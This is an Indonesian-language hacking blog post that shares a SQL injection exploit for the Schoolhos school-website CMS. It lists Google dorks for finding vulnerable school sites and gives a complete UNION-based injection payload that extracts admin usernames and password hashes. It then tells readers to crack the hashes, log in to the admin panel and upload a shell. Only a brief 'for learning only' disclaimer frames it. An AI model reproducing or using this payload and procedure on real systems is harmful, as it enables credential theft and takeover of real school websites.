Sunday 13 November 2016

Exploit CMS Schoolhos

We back,

Selamat dini hari guys, kali ini Etcday akan share Exploit CMS Schoolhost. oiya sebelumnya ini exploit lama namun masih banyak website-website yang menggunakan CMS ini termasuk website Sekolahan sch.id.


Email Support Schoolhos : support@schoolhos.com

Fan Page Schoolhos : Schoolhos Facebook

Twitter Schoolhos : Schoolhos Twitter

Situs Resmi Schoolhos : Official Schoolhos



okeh langsung saja ke Proof Of Concept nya hehehh :
disni saya akan menggunakan Parameter SQL pada website tersebut.

silakan cari target dengan Dork berikut :

inurl:/?p=siswa 
inurl:/?p=berita
intext:"Schoolhos Free Open Source CMS"
inurl:/?p=galeri

Dork bisa kalian kembangkan lagi biar "NTAPS".

POC :
http://victim.com/?p=detberita&id=[SQL][Payload]

Exploitnya :  

' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+


taarrraaaa, user dan password nya sudah kita dapat, tinggal hash passwordnya di

 https://hashkiller.co.uk .


silakan login  

http://victim.com/adminpanel

bila sukses silakan di upload shell ke sayangan kalian.

NB: Berhubung yang kita bahas website pendidikan diharapkan tidak menebas indexnya... :)
apa yang dibahas kali ini adalah untuk pembelajaran semata.
sekian dan terimaksih wassalam.


EmoticonEmoticon